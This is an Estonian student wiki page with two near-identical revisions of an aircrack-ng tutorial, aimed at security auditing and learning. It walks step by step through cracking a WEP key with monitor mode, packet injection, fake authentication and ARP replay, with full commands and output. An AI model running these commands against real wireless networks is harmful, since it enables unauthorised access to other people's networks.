ICO wiki - User contributions [en]

Aircrack

2015-05-26T09:36:49Z

Ktragel: /* Üldkirjeldus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

==Üldkirjeldus==

Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset ja juhtida tähelepanu selles haavatavatele kohtadele. <code>aircrack-ng</code>, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-26T09:24:32Z

Ktragel: /* Üldkirjeldus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

==Üldkirjeldus==

Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset. <code>aircrack-ng</code>, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

